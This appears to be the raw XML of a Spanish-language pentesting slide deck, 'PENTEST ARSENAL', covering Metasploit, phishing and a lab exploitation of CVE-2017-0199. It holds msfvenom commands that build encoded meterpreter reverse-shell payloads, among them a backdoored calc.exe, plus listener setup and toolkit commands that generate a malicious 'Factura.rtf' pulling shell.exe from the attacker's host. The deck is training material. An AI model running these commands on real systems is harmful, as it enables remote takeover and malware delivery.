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6" r:id="rId2"/>
    <p:sldId id="290" r:id="rId3"/>
    <p:sldId id="291" r:id="rId4"/>
    <p:sldId id="295" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="270" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="296" r:id="rId9"/>
    <p:sldId id="297" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="274" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="277" r:id="rId16"/>
    <p:sldId id="278" r:id="rId17"/>
    <p:sldId id="281" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="259" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="300" r:id="rId23"/>
    <p:sldId id="287" r:id="rId24"/>
    <p:sldId id="298" r:id="rId25"/>
    <p:sldId id="299" r:id="rId26"/>
    <p:sldId id="288" r:id="rId27"/>
    <p:sldId id="289" r:id="rId28"/>
    <p:sldId id="301" r:id="rId29"/>
    <p:sldId id="307" r:id="rId30"/>
    <p:sldId id="302" r:id="rId31"/>
    <p:sldId id="303" r:id="rId32"/>
    <p:sldId id="305" r:id="rId33"/>
    <p:sldId id="310" r:id="rId34"/>
    <p:sldId id="315" r:id="rId35"/>
    <p:sldId id="304" r:id="rId36"/>
    <p:sldId id="312" r:id="rId37"/>
    <p:sldId id="292" r:id="rId38"/>
    <p:sldId id="306" r:id="rId39"/>
    <p:sldId id="311" r:id="rId40"/>
    <p:sldId id="308" r:id="rId41"/>
    <p:sldId id="284" r:id="rId42"/>
    <p:sldId id="285" r:id="rId43"/>
    <p:sldId id="314" r:id="rId44"/>
    <p:sldId id="313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Vonique 92" panose="02000500000000090000" charset="0"/>
      <p:regular r:id="rId53"/>
      <p:italic r:id="rId54"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
      <p:regular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</p:embeddedFontLst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AF"/>
    <a:srgbClr val="004E8E"/>
    <a:srgbClr val="007DB0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75059" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="86" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="149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E65A-93A7-4635-AAE0-421A8DA7153F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8286A-CA51-425A-B4FA-47AF92213478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5533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/index.php?title=Metasploit&amp;action=edit&amp;section=8" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=4" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=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wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=6" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=5" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-ediciones_Metasploit-3" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-4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/index.php?title=Metasploit&amp;action=edit&amp;section=8" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=4" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=7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wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=6" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=5" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-ediciones_Metasploit-3" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-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19171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1091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ditar sección: Edición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versión gratuita. Contiene una interfaz de línea de comandos, la importación de terceros, la explotación manual y fuerza bruta. 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Community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ditar sección: Edición Community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2011, Rapid7 liberado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interfaz de usuario basada en la web gratuita para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incluye, detección de redes, navegación por módulo y la explotación manual.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ditar sección: Metasploit express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abril de 2010, Rapid7 libero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Express, una edición comercial de código abierto, para los equipos de seguridad que necesitan verificar vulnerabilidades. Ofrece una interfaz gráfica de usuario, integra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descubrimiento, y añade fuerza bruta inteligente, así como la recopilación de pruebas automatizado.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ditar sección: Metasploit Pro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2010, Rapid7 añadió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Pro, de código abierto para pruebas de penetración.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incluye todas las características de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y añade la exploración y explotación de aplicaciones web.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Editar sección: Armitage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herramienta de gestión gráfica para ciberataques del Proyecto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visualiza objetivos y recomienda métodos de ataque. Es un herramienta para ingenieros en seguridad web y es de código abierto. Destaca por sus contribuciones a la colaboración del equipo rojo, permitiendo sesiones compartidas, datos y comunicación a través de una única instancia Metasploit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4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0968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ditar sección: Edición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versión gratuita. Contiene una interfaz de línea de comandos, la importación de terceros, la explotación manual y fuerza bruta. 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Community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ditar sección: Edición Community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2011, Rapid7 liberado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interfaz de usuario basada en la web gratuita para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incluye, detección de redes, navegación por módulo y la explotación manual.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ditar sección: Metasploit express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abril de 2010, Rapid7 libero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Express, una edición comercial de código abierto, para los equipos de seguridad que necesitan verificar vulnerabilidades. Ofrece una interfaz gráfica de usuario, integra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descubrimiento, y añade fuerza bruta inteligente, así como la recopilación de pruebas automatizado.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ditar sección: Metasploit Pro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2010, Rapid7 añadió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Pro, de código abierto para pruebas de penetración.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incluye todas las características de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y añade la exploración y explotación de aplicaciones web.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Editar sección: Armitage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herramienta de gestión gráfica para ciberataques del Proyecto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visualiza objetivos y recomienda métodos de ataque. Es un herramienta para ingenieros en seguridad web y es de código abierto. Destaca por sus contribuciones a la colaboración del equipo rojo, permitiendo sesiones compartidas, datos y comunicación a través de una única instancia Metasploit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4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9659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1- Se envía documento especialmente diseñado con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objeto OLE2 embebido</a:t>
            </a:r>
          </a:p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2 – Usuario con versiones vulnerables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abre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el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documento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,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winword.exe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realiza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request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HTTP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para ejecutar un archivo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HTA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malicioso </a:t>
            </a:r>
          </a:p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3 – El archivo retornado por el server remoto es un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RTF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falso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con un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script HTA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malicioso </a:t>
            </a:r>
          </a:p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4 -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Winword.exe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observa por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application/hta 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en los objetos COM, lo que causa a la aplicacion (mshta.exe) cargar y ejecutar el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script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malicioso</a:t>
            </a:r>
          </a:p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5 – El script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ejecuta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un script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Visual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Basic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que contiene commandos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PowerShell </a:t>
            </a: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33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6948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1138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2751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133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401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49690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2489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9775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0310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855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741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9531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2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="39000">
              <a:schemeClr val="bg1">
                <a:tint val="98000"/>
                <a:satMod val="130000"/>
                <a:shade val="90000"/>
                <a:lumMod val="103000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="159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1370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downloads/details.aspx?familyid=86c0bfb3-e6b0-49d9-a667-e97f8ac7787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wp1810627-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3929" y="-15682"/>
            <a:ext cx="13028841" cy="6920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0869" y="909440"/>
            <a:ext cx="4672196" cy="259042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UY" sz="6900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Vonique 92"/>
                <a:cs typeface="Vonique 92"/>
              </a:rPr>
              <a:t>PENTEST</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-UY" sz="6900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Vonique 92"/>
                <a:cs typeface="Vonique 92"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-UY" sz="6900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Vonique 92"/>
                <a:cs typeface="Vonique 92"/>
              </a:rPr>
              <a:t>ARSENAL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50984" y="6021083"/>
            <a:ext cx="3684450" cy="5703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2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Vonique 92"/>
                <a:cs typeface="Vonique 92"/>
              </a:rPr>
              <a:t>Mr. Rodriguez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9818" y="6138195"/>
            <a:ext cx="2487004" cy="44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4609470" y="5911324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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Vonique 92"/>
                <a:cs typeface="Vonique 92"/>
              </a:rPr>
              <a:t>Una presentación de</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284257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632"/>
            <a:ext cx="12192000" cy="67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87" y="1014412"/>
            <a:ext cx="101822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2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904"/>
            <a:ext cx="12192000" cy="65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5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45" y="1107994"/>
            <a:ext cx="10430108" cy="5493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0972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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Campañas de Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240084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4679"/>
            <a:ext cx="12192000" cy="52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5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3201"/>
            <a:ext cx="12192000" cy="473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9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2515"/>
            <a:ext cx="12192000" cy="37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6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991" y="283467"/>
            <a:ext cx="71913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7" y="1228725"/>
            <a:ext cx="118967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r_robot_season_2_by_ipeccatore-daa21z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391" y="-219518"/>
            <a:ext cx="12375461" cy="8254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3212" y="964635"/>
            <a:ext cx="3734165" cy="128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s-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un acercamiento a técnicas y métodos de trabajo en pentesting y hacking.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5429" y="4021450"/>
            <a:ext cx="12192000" cy="1115736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="0" rev="1800000"/>
            </a:camera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7000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Vonique 92"/>
                <a:cs typeface="Vonique 92"/>
              </a:rPr>
              <a:t>PENTEST ARSENAL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9134" y="6043227"/>
            <a:ext cx="3156906" cy="67365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001232" y="991595"/>
            <a:ext cx="3734165" cy="128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UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Utilizando herramientas reales para tomar control remoto de dispositivos tecnológicos modernos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3168912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225" y="0"/>
            <a:ext cx="5057775" cy="674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33815" y="2964076"/>
            <a:ext cx="713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600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial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93190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76" y="2062294"/>
            <a:ext cx="9238750" cy="353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4058" y="443901"/>
            <a:ext cx="713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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Estructura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1440790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39755" y="514879"/>
            <a:ext cx="10478278" cy="5632311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exploit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ms08_067_netapi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use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/scanner/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portscan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set RHOSTS 192.168.218.0/24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RHOSTS =&gt; 192.168.218.0/24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set THREADS 50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THREADS =&gt; 50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set PORTS 445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PORTS =&gt; 445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027 of 256 hosts (010%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052 of 256 hosts (020%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079 of 256 hosts (030%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103 of 256 hosts (040%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128 of 256 hosts (050%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192.168.218.136:445 - TCP OPEN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154 of 256 hosts (060%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180 of 256 hosts (070%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210 of 256 hosts (082%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232 of 256 hosts (090%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256 of 256 hosts (100%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module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Y" altLang="es-UY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5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6553" y="1663989"/>
            <a:ext cx="9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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Msfpaylod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Msfencoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004E8E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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-1" y="2846910"/>
            <a:ext cx="12192000" cy="1723549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root@kali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:~#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msfvenom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-a x86 --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-x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" altLang="es-UY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339966"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calc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.exe -p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lhost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=192.168.101.133 -f exe -o sol_bdoor.exe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10 compatible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encoders</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="DDDDD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Attempting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of x86/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shikata_ga_nai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x86/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shikata_ga_nai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succeeded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299 (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iteration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=0) x86/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shikata_ga_nai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chosen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final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299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: 299 bytes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Saved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as: sol_bdoor.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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Y" altLang="es-UY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198" y="419513"/>
            <a:ext cx="937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>
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Herramientas independientes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03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0972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 err="1">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004E8E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03508" y="2181689"/>
            <a:ext cx="2581375" cy="30777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-l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encoders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</a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0087A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0865" y="3785475"/>
            <a:ext cx="11941134" cy="92333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UY" altLang="es-UY" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>#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-p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windows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meterpreter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reverse_tcp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LHOST=192.168.0.3 LPORT=4444 -f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raw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-e x86/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shikata_ga_nai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-i 5 |  msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw |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-a x86 --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platform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windows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-e x86/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shikata_ga_nai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-i 9 -f exe -o payload.exe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</a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0087A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1597833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rgbClr val="004E8E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listado de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoders</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004E8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297994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400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> encadenado</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004E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71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1412" y="1710686"/>
            <a:ext cx="90040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Con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>msfvenom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solo se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crea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el payload,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falta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87AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>crear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el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>listener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que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permitirá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aceptar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la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conexión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reversa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de la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explotación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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US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fontAlgn="base"/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Para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ello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en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una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terminal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US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fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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sudo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msfconsole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use exploit/multi/handler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set PAYLOAD windows/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meterpreter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/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reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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set LHOST 192.168.193.128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set LPORT 443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exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0087AF"/>
              </a:solidFill>
              <a:effectLst/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972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>
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Servidor del atacante</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2651552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7714"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1673777"/>
            <a:ext cx="12191999" cy="3823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0972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>
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Posibilidades post-explotación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3252312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9" y="144631"/>
            <a:ext cx="9218183" cy="66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21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3u5FY8g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46503" y="2892830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FFFFFF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37862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747" y="2941418"/>
            <a:ext cx="10926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Uso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conocimiento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bajo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su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responsabilidad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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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El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uso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de las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herramientas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pueden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provocar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daño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  <a:endParaRPr lang="es-UY" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB0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35421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8697" y="2038478"/>
            <a:ext cx="731309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UY" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Guillermo Rodríguez</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004E8E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Asesor en seguridad de la información </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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con 11 años de experiencia.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664842" y="519915"/>
            <a:ext cx="2611644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s-UY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UY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whoami</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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248697" y="3907365"/>
            <a:ext cx="65909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UY" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Certified Ethical Hacker – ECC84496186763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7407" r="22670"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2889956" cy="685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6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18308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Atacante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Parrot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Linux 3.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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Metasploit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handler</a:t>
            </a:r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192.168.193.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Victima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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr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MS Windows 10 </a:t>
            </a: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Updated</a:t>
            </a:r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MS Office 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr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192.168.193.1</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0087A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501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2434" y="1959428"/>
            <a:ext cx="107955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CVE-2017-0199 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nació como un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0-day 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que explotaba las últimas versiones de Microsoft Office, concretamente un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RTF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que se vio inicialmente en un manual militar en ruso con objetivos en la República de </a:t>
            </a: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Donestk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y que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comprometía el PC de la víctima con sólo abrirlo (permitía RCE).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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just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Luego se usó también para instalar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malware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como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Latentbot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y en campañas del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troyano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bancario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800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dridex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, aunque hasta ahora no había mucho detalle del </a:t>
            </a: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exploit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44532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2434" y="1959428"/>
            <a:ext cx="1079551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CVE-2017-0199 – Riesgo total 7,8/10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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just"/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Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY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just"/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Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 y Windows 10. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY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just"/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Permite ejecución remota de código arbitrario a través de un documento de MS Office especialmente diseñado,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aka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"Microsoft Office/WordPad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Remote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Code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Execution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Vulnerability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w/Windows API."</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0087AF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326624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3" y="1922447"/>
            <a:ext cx="12198783" cy="39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8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2434" y="1959428"/>
            <a:ext cx="10795518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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2017-0199 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY" sz="2400" noProof="1">
              <a:solidFill>
                <a:srgbClr val="0087AF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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1- Se envía documento especialmente diseñado con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objeto OLE2 embebido</a:t>
            </a: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2 – Usuario con versiones vulnerables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abre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el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documento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,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winword.exe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realiza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request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HTTP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para ejecutar un archivo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HTA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malicioso </a:t>
            </a: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3 – El archivo retornado por el server remoto es un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RTF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falso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con un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script HTA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malicioso </a:t>
            </a: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4 -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Winword.exe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observa por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application/hta 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en los objetos COM, lo que causa a la aplicacion (mshta.exe) cargar y ejecutar el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script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malicioso</a:t>
            </a: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5 – El script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ejecuta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un script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Visual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Basic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que contiene commandos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PowerShell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284925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193" y="2205756"/>
            <a:ext cx="109261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cve-2017-0199_toolkit.py -M gen -w Factura.rtf -u http://192.168.193.128/logo.doc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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msfvenom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-p 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meterpreter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reverse_tcp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LHOST=192.168.193.128 LPORT=4444 -f exe &gt; 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/shell.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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msfconsole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-x "use multi/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set PAYLOAD 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meterpreter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reverse_tcp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set LHOST 192.168.193.128; run“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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cve-2017-0199_toolkit.py -M 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http://192.168.193.128/shell.exe -l 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/shell.exe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288447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748" y="2127379"/>
            <a:ext cx="106624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DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>es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una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extensión</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
